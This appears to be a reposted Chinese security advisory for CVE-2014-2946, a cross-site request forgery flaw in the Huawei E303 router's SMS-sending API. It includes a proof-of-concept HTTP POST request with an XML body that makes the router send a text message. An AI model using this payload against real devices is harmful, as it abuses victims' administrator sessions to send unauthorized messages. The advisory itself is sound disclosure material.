Huawei E303路由器跨站请求伪造漏洞

发布日期:2014-05-30
更新日期:2014-06-03

受影响系统:
Huawei E303
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 67747
 CVE(CAN) ID: CVE-2014-2946
 
Huawei E303路由器是无线宽带调制解调器。 
 
Huawei E303 Router(固件版本CH2E303SM)在/api/sms/send-sms URL的实现上存在跨站请求伪造攻击,远程攻击者通过XML文档内的请求元素,利用此漏洞可劫持管理员身份验证请求。
 
<*来源:Benjamin Daniel Mussler
 
  链接:
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
[Proof -of-concept HTTP POST request]:
 POST /api/sms/send-sms HTTP/1.1
 Host: hi.link
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-us,en;q=0.8,de-de;q=0.5,de;q=0.3
 Accept-Encoding: gzip, deflate
 Referer:
 Connection: keep-alive
 Content-Type: text/plain
 Content-Length: 225
 
<?xml version="1.0"
encoding="UTF-8"?><request><Index>-1</Index><Phones><Phone>4422</Phone></Phones><Sca></Sca><Content>
 Sample Text</Content><Length>0</Length><Reserved>1</Reserved><Date>2013-12-03
16:00:00</Date></request>

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Huawei
 ------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/451b18c01e29c7ee5188ff9aa2365e74.html